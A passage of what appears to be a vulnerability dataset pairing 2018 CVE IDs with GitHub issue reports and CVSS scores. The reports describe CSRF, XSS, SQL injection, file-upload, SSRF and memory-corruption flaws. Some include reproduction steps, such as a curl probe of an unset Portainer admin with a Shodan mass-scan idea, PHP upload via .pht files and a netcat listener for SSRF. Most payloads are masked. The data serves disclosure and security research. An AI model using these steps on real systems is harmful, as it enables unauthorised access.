  28397. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2186",
  28398. "Repo_new": "fasterxml/jackson-databind",
  28399. "Issue_Created_At": "2018-11-18T23:39:02Z",
  28400. "description": "Block more classes from polymorphic deserialization (placeholder). This is placeholder issue for fixes for as of yet unpublished CVEs, ids to be allocated. Once fix verified, included in NUMBERTAG branch, will be updated with actual ids.",
  28401. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28402. "severity": "CRITICAL",
  28403. "baseScore": 9.8,
  28404. "impactScore": 5.9,
  28405. "exploitabilityScore": 3.9
  28406. },
  28407. {
  28408. "CVE_ID": "CVE-2018-19367",
  28409. "Issue_Url_old": "https://github.com/portainer/portainer/issues/2475",
  28410. "Issue_Url_new": "https://github.com/portainer/portainer/issues/2475",
  28411. "Repo_new": "portainer/portainer",
  28412. "Issue_Created_At": "2018-11-19T22:51:53Z",
  28413. "description": "Responsible Disclosure Check if admin already created by a public API endpoint. Portainer Check if admin already created by a public API endpoint PRODUCT DESCRIPTION FILETAG IS AN OPEN SOURCE LIGHTWEIGHT MANAGEMENT UI WHICH ALLOWS YOU TO EASILY MANAGE YOUR DOCKER HOSTS OR SWARM CLUSTERS BACKGROUND Portainer until NUMBERTAG ULNERABILITY DETAILS Portainer provides an API endpoint ( PATHTAG ) to verify that the admin user is already created. This API endpoint will return ERRORTAG if admin was not created and NUMBERTAG if it was already created. This \"feature\" allows anyone to receive unauthorized access on the host when the portainer is configured incorrectly. PROOF OF CONCEPT Manual steps to reproduce the vulnerability NUMBERTAG docker run rm it p NUMBERTAG PATHTAG portainer/portainer NUMBERTAG curl X GET s o /dev/null w \"%{http_code}\" URLTAG NUMBERTAG If curl return ERRORTAG , open web browser and create a admin password. xdg open URLTAG Applying this around the world with shodan: CODETAG If you has a paid plan, you can use a filters: ERRORTAG Output example: ERRORTAG WORKAROUND Forcing the admin password by extra parameter on portainer CLI FILETAG admin password URLTAG . On source code portainer.go L NUMBERTAG L NUMBERTAG URLTAG . VULNERABILITY DISCLOSURE TIMELINE NUMBERTAG endor was contacted AUTHOR & REVISION Author: Gustavo Lichti <gustavo. EMAILTAG > Revision: More info: shodan portainer URLTAG",
  28414. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28415. "severity": "CRITICAL",
  28416. "baseScore": 9.8,
  28417. "impactScore": 5.9,
  28418. "exploitabilityScore": 3.9
  28419. },
  28420. {
  28421. "CVE_ID": "CVE-2018-19376",
  28422. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/114",
  28423. "Issue_Url_new": "https://github.com/greencms/greencms/issues/114",
  28424. "Repo_new": "greencms/greencms",
  28425. "Issue_Created_At": "2018-11-20T17:04:18Z",
  28426. "description": "There is a csrf vulnerability that once click a url which include payload can delect webserver log. when a authenticated administator click a url which include payload, then the webserver log will be deleted poc: APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  28427. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  28428. "severity": "MEDIUM",
  28429. "baseScore": 6.5,
  28430. "impactScore": 3.6,
  28431. "exploitabilityScore": 2.8
  28432. },
  28433. {
  28434. "CVE_ID": "CVE-2018-19417",
  28435. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/600",
  28436. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/600",
  28437. "Repo_new": "contiki-ng/contiki-ng",
  28438. "Issue_Created_At": "2018-07-11T12:21:53Z",
  28439. "description": "Stack based buffer overflow while parsing MQTT messages (parsing PUBLISH message with variable length header). Function APITAG that parses MQTT PUBLISH messages with variable length header (see details in: URLTAG tries to memcpy input data into fixed size buffer. Allocated buffer can fit only MQTT_MAX_TOPIC_LENGTH NUMBERTAG bytes and the length check is missing. Declaration of buffer: PATHTAG struct mqtt_message { uint NUMBERTAG t mid; char topic[MQTT_MAX_TOPIC_LENGTH NUMBERTAG for string termination / PATHTAG define MQTT_MAX_TOPIC_LENGTH NUMBERTAG Overflow: PATHTAG memcpy(&conn APITAG APITAG &input_data_ptr[ pos], copy_bytes); This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). Proposed CVSS score: PATHTAG NUMBERTAG Critical) Mitigation : The size of data copied to topic buffer should be limited to MQTT_MAX_TOPIC_LENGTH. Crash details using Address Sanitizer (line number could not match to original sources): APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fff NUMBERTAG a NUMBERTAG a0 at pc NUMBERTAG fe2a1b NUMBERTAG bp NUMBERTAG fff NUMBERTAG a NUMBERTAG sp NUMBERTAG fff NUMBERTAG a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fff NUMBERTAG a NUMBERTAG a0 thread T NUMBERTAG fe2a1b NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG d NUMBERTAG in parse_publish_vhdr PATHTAG NUMBERTAG d NUMBERTAG in tcp_input PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fe2a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG fff NUMBERTAG a NUMBERTAG a0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG ef in main PATHTAG This frame has NUMBERTAG object(s NUMBERTAG conn' APITAG NUMBERTAG e NUMBERTAG c NUMBERTAG f3]f3 f3 f3 f3 f3 f3 f NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG e NUMBERTAG c NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING Crash details from exploitable gdb plugin: CRASH SUMMARY Filename: PATHTAG SHA1: APITAG Classification: EXPLOITABLE Hash: APITAG Command: FILETAG PATHTAG Faulting Frame: None NUMBERTAG ffff NUMBERTAG in ? Disassembly: Stack Head NUMBERTAG entries): None NUMBERTAG ffff NUMBERTAG in ? None NUMBERTAG in ? Registers: ra NUMBERTAG rb NUMBERTAG a8d NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG ffff7dd1b NUMBERTAG rbp NUMBERTAG d NUMBERTAG rsp NUMBERTAG fffffffd7d0 r NUMBERTAG e NUMBERTAG r NUMBERTAG r NUMBERTAG b8 r NUMBERTAG ffff7a NUMBERTAG f0 r NUMBERTAG cc0 r NUMBERTAG fffffffd8a0 r NUMBERTAG ff NUMBERTAG r NUMBERTAG rip NUMBERTAG ffff NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Segmentation fault on program counter Short description: APITAG NUMBERTAG Explanation: The target tried to access data at an address that matches the program counter. This is likely due to the execution of a branch instruction (ex: 'call') with a bad argument, but it could also be due to execution continuing past the end of a memory region or another cause. Regardless this likely indicates that the program counter contents are tainted and can be controlled by an attacker. END SUMMARY",
  28440. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  28441. "severity": "CRITICAL",
  28442. "baseScore": 10.0,
  28443. "impactScore": 6.0,
  28444. "exploitabilityScore": 3.9
  28445. },
  28446. {
  28447. "CVE_ID": "CVE-2018-19420",
  28448. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1301",
  28449. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1301",
  28450. "Repo_new": "getsimplecms/getsimplecms",
  28451. "Issue_Created_At": "2018-11-14T20:30:24Z",
  28452. "description": "APITAG allowed to some files that are able to execute HTML. Brief of this vulnerability APITAG allowed to upload the files that are able to execute HTML files. There are NUMBERTAG types of HTML executable files. HTML File with no extension HTML File with uncommon extension ( e.g. asdf) HTML encoded as EML ( Triggered in IE only ) (I also confirmed about SVG issue, but there was the issue already NUMBERTAG Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affect version NUMBERTAG Payload move to APITAG with admin credential Upload prepared malformed files. HTML File with no extension Filename test APITAG HTML File with uncommon extension Filename APITAG APITAG HTML File encoded as EML Filename test.eml APITAG NUMBERTAG Click the uploaded file name or move to APITAG NUMBERTAG Profit! Reason of This Vulnerability In APITAG , Third parameter of APITAG is not exist. Function APITAG is in APITAG and Third parameter, mime , will be null. As a result, the file filtering of APITAG depend on extensions. ( Not use MIME Type ) It can allows to upload the three type files that I introduced.",
  28453. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N",
  28454. "severity": "LOW",
  28455. "baseScore": 3.8,
  28456. "impactScore": 2.5,
  28457. "exploitabilityScore": 1.2
  28458. },
  28459. {
  28460. "CVE_ID": "CVE-2018-19422",
  28461. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/801",
  28462. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/801",
  28463. "Repo_new": "intelliants/subrion",
  28464. "Issue_Created_At": "2018-11-14T19:18:24Z",
  28465. "description": "Subrion allows to upload pht, phar extensions.. Brief of this vulnerability In uploading process, Subrion allows to upload pht, phar files. There are able to execute as PHP script following server environment. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Affect version NUMBERTAG Payload NUMBERTAG move to APITAG with admin credential NUMBERTAG Save php codes with pht or phar extensions. and upload it like below. APITAG NUMBERTAG Right Click and Open the uploaded file name or move to APITAG NUMBERTAG Profit! Reason of This Vulnerability Subrion has APITAG file for preventing execution of uploaded file. CODETAG In upload directory, APITAG did not prevent execution of the files that have the pht and phar extensions. As a result, they are able to execute as PHP script. I tested the pht extensions because my test environment is PHP NUMBERTAG so APITAG can not execute phar extension scripts as PHP. But If Subrion installed in PHP NUMBERTAG envrionment, phar extension is also able to execute as PHP.",
  28466. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  28467. "severity": "HIGH",
  28468. "baseScore": 7.2,
  28469. "impactScore": 5.9,
  28470. "exploitabilityScore": 1.2
  28471. },
  28472. {
  28473. "CVE_ID": "CVE-2018-19432",
  28474. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/427",
  28475. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/427",
  28476. "Repo_new": "libsndfile/libsndfile",
  28477. "Issue_Created_At": "2018-11-22T03:19:43Z",
  28478. "description": "out of bounds read in sf_write_int. version libsndfile: Version released NUMBERTAG description An issue was discovered in libsndfile NUMBERTAG There is an out of bounds read at function sf_write_int, will lead to a denial of service or the others. ERRORTAG debug info In function deinterleave_int, 'ch' is NUMBERTAG leads to the array bounds, and then crash in function sf_write_int . ERRORTAG FILETAG others this bug is reported by pwd MENTIONTAG please send email to EMAILTAG if you have some quetion.",
  28479. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28480. "severity": "MEDIUM",
  28481. "baseScore": 6.5,
  28482. "impactScore": 3.6,
  28483. "exploitabilityScore": 2.8
  28484. },
  28485. {
  28486. "CVE_ID": "CVE-2018-19433",
  28487. "Issue_Url_old": "https://github.com/star7th/showdoc/issues/392",
  28488. "Issue_Url_new": "https://github.com/star7th/showdoc/issues/392",
  28489. "Repo_new": "star7th/showdoc",
  28490. "Issue_Created_At": "2018-11-22T03:48:25Z",
  28491. "description": "There is a XSS. In the FILETAG line NUMBERTAG APITAG APITAG accept the parameter from the APITAG ,then in the line NUMBERTAG APITAG put the parameter directly in the html i reproduce the attack in the docker. after set up the docker, just open the url: URLTAG then: APITAG the source code: FILETAG remove APITAG if you want to reproduce it again",
  28492. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28493. "severity": "MEDIUM",
  28494. "baseScore": 6.1,
  28495. "impactScore": 2.7,
  28496. "exploitabilityScore": 2.8
  28497. },
  28498. {
  28499. "CVE_ID": "CVE-2018-19469",
  28500. "Issue_Url_old": "https://github.com/woider/ArticleCMS/issues/5",
  28501. "Issue_Url_new": "https://github.com/woider/articlecms/issues/5",
  28502. "Repo_new": "woider/articlecms",
  28503. "Issue_Created_At": "2018-11-22T09:41:27Z",
  28504. "description": "In the modified name XSS attacks with the location of the mailbox. POC\uff1a ERRORTAG location\uff1a ERRORTAG",
  28505. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  28506. "severity": "MEDIUM",
  28507. "baseScore": 6.1,
  28508. "impactScore": 2.7,
  28509. "exploitabilityScore": 2.8
  28510. },
  28511. {
  28512. "CVE_ID": "CVE-2018-19517",
  28513. "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/199",
  28514. "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/199",
  28515. "Repo_new": "sysstat/sysstat",
  28516. "Issue_Created_At": "2018-11-23T08:36:20Z",
  28517. "description": "bug report]: out of bound read in sadf which leads to crash.. Version APITAG Description The remap_struct function in APITAG NUMBERTAG has an out of bounds read during a memset call, as demonstrated by sadf. Related APITAG ERRORTAG Additional Information As the debug info shows, the args of memset points to an invalid address. ERRORTAG ASAN ERRORTAG [poc here URLTAG",
  28518. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28519. "severity": "MEDIUM",
  28520. "baseScore": 5.5,
  28521. "impactScore": 3.6,
  28522. "exploitabilityScore": 1.8
  28523. },
  28524. {
  28525. "CVE_ID": "CVE-2018-19530",
  28526. "Issue_Url_old": "https://github.com/httl/httl/issues/225",
  28527. "Issue_Url_new": "https://github.com/httl/httl/issues/225",
  28528. "Repo_new": "httl/httl",
  28529. "Issue_Created_At": "2018-11-19T05:58:57Z",
  28530. "description": "decodexml \u914d\u7f6exstream.",
  28531. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28532. "severity": "CRITICAL",
  28533. "baseScore": 9.8,
  28534. "impactScore": 5.9,
  28535. "exploitabilityScore": 3.9
  28536. },
  28537. {
  28538. "CVE_ID": "CVE-2018-19531",
  28539. "Issue_Url_old": "https://github.com/httl/httl/issues/224",
  28540. "Issue_Url_new": "https://github.com/httl/httl/issues/224",
  28541. "Repo_new": "httl/httl",
  28542. "Issue_Created_At": "2018-11-19T05:51:53Z",
  28543. "description": "APITAG \u51fd\u6570\u5b58\u5728\u5b89\u5168\u95ee\u9898. APITAG APITAG set(xml2=' APITAG APITAG APITAG APITAG APITAG APITAG calc APITAG APITAG APITAG APITAG APITAG APITAG ') APITAG APITAG APITAG set(xml1=' APITAG APITAG APITAG APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG false APITAG APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG start APITAG APITAG APITAG APITAG foo APITAG APITAG APITAG foo APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG false APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG false APITAG APITAG APITAG false APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ') APITAG",
  28544. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28545. "severity": "CRITICAL",
  28546. "baseScore": 9.8,
  28547. "impactScore": 5.9,
  28548. "exploitabilityScore": 3.9
  28549. },
  28550. {
  28551. "CVE_ID": "CVE-2018-19535",
  28552. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/428",
  28553. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/428",
  28554. "Repo_new": "exiv2/exiv2",
  28555. "Issue_Created_At": "2018-09-01T05:40:24Z",
  28556. "description": "APITAG heap buffer overflow at APITAG When running APITAG NUMBERTAG c6f) against png files, , ASAN reports a heap buffer overflow error. POCs: FILETAG FILETAG ASAN output: ERRORTAG",
  28557. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28558. "severity": "MEDIUM",
  28559. "baseScore": 6.5,
  28560. "impactScore": 3.6,
  28561. "exploitabilityScore": 2.8
  28562. },
  28563. {
  28564. "CVE_ID": "CVE-2018-19539",
  28565. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/182",
  28566. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/182",
  28567. "Repo_new": "jasper-software/jasper",
  28568. "Issue_Created_At": "2018-07-13T05:02:09Z",
  28569. "description": "NUMBERTAG bugs found by APITAG (heap buffer overflows, Null pointer dereference and assertion failures). Hi all, These bugs were found with APITAG an input structure aware extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. These bugs were found on Ubuntu NUMBERTAG bit Jasper revision NUMBERTAG a6e4 (HEAD) To reproduce: jasper input APITAG .jp2 input format jp2 output /dev/null output format bmp Bug triggering files are attached. Bug NUMBERTAG Heap Buffer Overflow Read of size NUMBERTAG APITAG ASAN says: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e9c8 at pc NUMBERTAG f NUMBERTAG adebb NUMBERTAG bp NUMBERTAG ffefa1c9e NUMBERTAG sp NUMBERTAG ffefa1c9e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e9c8 thread T NUMBERTAG f NUMBERTAG adebb NUMBERTAG in jas_image_depalettize PATHTAG NUMBERTAG f NUMBERTAG ae0e0ee in jp2_decode PATHTAG NUMBERTAG f NUMBERTAG ade NUMBERTAG c in jas_image_decode PATHTAG NUMBERTAG c in main PATHTAG NUMBERTAG f NUMBERTAG aa NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG e9c8 is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
  28570. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28571. "severity": "MEDIUM",
  28572. "baseScore": 6.5,
  28573. "impactScore": 3.6,
  28574. "exploitabilityScore": 2.8
  28575. },
  28576. {
  28577. "CVE_ID": "CVE-2018-19548",
  28578. "Issue_Url_old": "https://github.com/EduSec/EduSec/issues/14",
  28579. "Issue_Url_new": "https://github.com/edusec/edusec/issues/14",
  28580. "Repo_new": "EduSec/EduSec",
  28581. "Issue_Created_At": "2018-11-23T07:13:38Z",
  28582. "description": "User login security issues. Login interface APITAG APITAG can use a password mechanism that does not prevent brute force cracking, and can use brute force cracking tools to iterate over user names and passwords. Methods: burpsuite pro was used to grab the login packet of the user and then send it to the intruder function to violently guess the user name and password. FILETAG FILETAG FILETAG Solution: you can use a captcha mechanism, or you can use an account or limit the number of times an account name and password error can be checked",
  28583. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28584. "severity": "CRITICAL",
  28585. "baseScore": 9.8,
  28586. "impactScore": 5.9,
  28587. "exploitabilityScore": 3.9
  28588. },
  28589. {
  28590. "CVE_ID": "CVE-2018-19557",
  28591. "Issue_Url_old": "https://github.com/assnr/arcms/issues/1",
  28592. "Issue_Url_new": "https://github.com/assnr/arcms/issues/1",
  28593. "Repo_new": "assnr/arcms",
  28594. "Issue_Created_At": "2018-11-23T07:37:34Z",
  28595. "description": "APITAG Access and SQL Injection. Hello,when I browse the code of arcms,I surprised it didn't set permssion for admin' APITAG can visit the URL below and make some operation on demo website NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG etc Then,I found a SQL injection in PATHTAG ERRORTAG Look at FILETAG",
  28596. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28597. "severity": "CRITICAL",
  28598. "baseScore": 9.8,
  28599. "impactScore": 5.9,
  28600. "exploitabilityScore": 3.9
  28601. },
  28602. {
  28603. "CVE_ID": "CVE-2018-19559",
  28604. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/5",
  28605. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/5",
  28606. "Repo_new": "cuppacms/cuppacms",
  28607. "Issue_Created_At": "2018-11-08T09:18:03Z",
  28608. "description": "APITAG has SQL injection vulnerability. Affected software: APITAG Type of vulnerability: SQL injection Discovered by: darkrerror SQL Injection in PATHTAG with parameter reference_id function APITAG if(! APITAG FILETAG sqlmap tool screenshot FILETAG",
  28609. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  28610. "severity": "CRITICAL",
  28611. "baseScore": 9.8,
  28612. "impactScore": 5.9,
  28613. "exploitabilityScore": 3.9
  28614. },
  28615. {
  28616. "CVE_ID": "CVE-2018-19560",
  28617. "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/4",
  28618. "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/4",
  28619. "Repo_new": "bagesoft/bagecms",
  28620. "Issue_Created_At": "2018-11-09T02:02:41Z",
  28621. "description": "There is a CSRF vulnerability that can be used to modify administrator accounts to get system privileges.. When the administrator lands, open it. APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  28622. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28623. "severity": "HIGH",
  28624. "baseScore": 8.8,
  28625. "impactScore": 5.9,
  28626. "exploitabilityScore": 2.8
  28627. },
  28628. {
  28629. "CVE_ID": "CVE-2018-19561",
  28630. "Issue_Url_old": "https://github.com/chenfeizhou/sikcms-v1.1/issues/1",
  28631. "Issue_Url_new": "https://github.com/chenfeizhou/sikcms-v1.1/issues/1",
  28632. "Repo_new": "chenfeizhou/sikcms-v1.1",
  28633. "Issue_Created_At": "2018-11-09T09:18:42Z",
  28634. "description": "CSRF vulnerability can be added to administrator account.. When the administrator lands, open it. APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  28635. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  28636. "severity": "HIGH",
  28637. "baseScore": 8.8,
  28638. "impactScore": 5.9,
  28639. "exploitabilityScore": 2.8
  28640. },
  28641. {
  28642. "CVE_ID": "CVE-2018-19599",
  28643. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/467",
  28644. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/467",
  28645. "Repo_new": "monstra-cms/monstra",
  28646. "Issue_Created_At": "2020-05-25T03:57:37Z",
  28647. "description": "Cross Site Scripting Vulnerability on APITAG upload file SVG in Monstra NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. Monstra application allows the upload of a SVG file extension (which is also an image type). Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel Monstra NUMBERTAG Go to PATHTAG NUMBERTAG Upload file APITAG APITAG NUMBERTAG Open file upload : PATHTAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Desktop (please complete the following information): OS: Kali Browser: Firefox Version of Browser NUMBERTAG",
  28648. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  28649. "severity": "MEDIUM",
  28650. "baseScore": 5.4,
  28651. "impactScore": 2.7,
  28652. "exploitabilityScore": 2.3
  28653. },
  28654. {
  28655. "CVE_ID": "CVE-2018-19600",
  28656. "Issue_Url_old": "https://github.com/rhymix/rhymix/issues/1088",
  28657. "Issue_Url_new": "https://github.com/rhymix/rhymix/issues/1088",
  28658. "Repo_new": "rhymix/rhymix",
  28659. "Issue_Created_At": "2018-09-16T08:51:31Z",
  28660. "description": "XSS via SVG file upload in Rhymix CMS NUMBERTAG Affected software: Rhymix CMS NUMBERTAG Type of vulnerability: XSS via SVG file upload. Description: Rhymix CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Remediation: Your script should properly sanitize user input. URLTAG Here is the crafted code for XSS. save this code as SVG file i.e. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Steps to reproduce the vulnerability NUMBERTAG login site as admin NUMBERTAG Open URL URLTAG NUMBERTAG Upload SVG file with crafted XSS code APITAG image APITAG FILETAG NUMBERTAG Open uploaded the file to execute XSS payload APITAG image APITAG FILETAG Discovered by: Provensec Website: FILETAG Author: Subodh Kumar",
  28661. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  28662. "severity": "MEDIUM",
  28663. "baseScore": 4.8,
  28664. "impactScore": 2.7,
  28665. "exploitabilityScore": 1.7
  28666. },
  28667. {
  28668. "CVE_ID": "CVE-2018-19601",
  28669. "Issue_Url_old": "https://github.com/rhymix/rhymix/issues/1089",
  28670. "Issue_Url_new": "https://github.com/rhymix/rhymix/issues/1089",
  28671. "Repo_new": "rhymix/rhymix",
  28672. "Issue_Created_At": "2018-09-16T08:56:44Z",
  28673. "description": "SSRF via SVG file upload in Rhymix CMS NUMBERTAG Affected software: Rhymix CMS NUMBERTAG Type of vulnerability: SSRF via SVG file upload. Description: Discovered by: Provensec Website: FILETAG Author: Subodh Kumar Description: SSRF as in Server Side Request Forgery is a vulnerability that allows an attacker to force server interfaces into sending packets initiated by the victim server to the local interface or to another server behind the firewall. Consult Web References for more information about this problem. Impact on the server: Abuse the trust relationship between the vulnerable server and others. Bypass IP whitelisting. Bypass host based authentication services. Read resources which are not accessible to the public, such as trace.axd in ASP.NET or metadata APIs in an AWS environment. Scan the internal network to which the server is connected to. Read files from the web server. View Status Pages and interact with APIs as the web server. Retrieve sensitive information such as the IP address of a web server behind a reverse proxy. Remediation: Your script should properly sanitize user input. URLTAG Here is the crafted code for SSRF. Save this code as .svg file i.e. SSRF.svg APITAG APITAG APITAG APITAG Steps to reproduce the vulnerability NUMBERTAG login site as admin NUMBERTAG Open URL URLTAG NUMBERTAG Upload SVG file with crafted SSRF code APITAG image APITAG FILETAG NUMBERTAG Start netcat listener using the command \"nc nvlp NUMBERTAG APITAG image APITAG FILETAG NUMBERTAG Open uploaded the file NUMBERTAG Check netcat listener APITAG image APITAG FILETAG",
  28674. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
  28675. "severity": "CRITICAL",
  28676. "baseScore": 9.1,
  28677. "impactScore": 6.0,
  28678. "exploitabilityScore": 2.3
  28679. },
  28680. {
  28681. "CVE_ID": "CVE-2018-19607",
  28682. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/561",
  28683. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/561",
  28684. "Repo_new": "exiv2/exiv2",
  28685. "Issue_Created_At": "2018-11-23T14:14:35Z",
  28686. "description": "SEGV in APITAG at APITAG Tested in ubuntu NUMBERTAG bit, exi NUMBERTAG master dee NUMBERTAG a NUMBERTAG RC2) APITAG POC file URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
  28687. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  28688. "severity": "MEDIUM",
  28689. "baseScore": 6.5,
  28690. "impactScore": 3.6,
  28691. "exploitabilityScore": 2.8
  28692. },
  28693. {
  28694. "CVE_ID": "CVE-2018-19620",
  28695. "Issue_Url_old": "https://github.com/star7th/showdoc/issues/397",
  28696. "Issue_Url_new": "https://github.com/star7th/showdoc/issues/397",
  28697. "Repo_new": "star7th/showdoc",
  28698. "Issue_Created_At": "2018-11-28T01:21:42Z",
  28699. "description": "Incorrect Access Control. Hello, A bug in the project. I think I should connect you through you APITAG check you gmail later, Thank you.",
  28700. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  28701. "severity": "MEDIUM",
  28702. "baseScore": 4.3,
  28703. "impactScore": 1.4,
  28704. "exploitabilityScore": 2.8
  28705. },
  28706. {
  28707. "CVE_ID": "CVE-2018-19661",
  28708. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/429",
  28709. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/429",
  28710. "Repo_new": "libsndfile/libsndfile",
  28711. "Issue_Created_At": "2018-11-27T08:57:34Z",
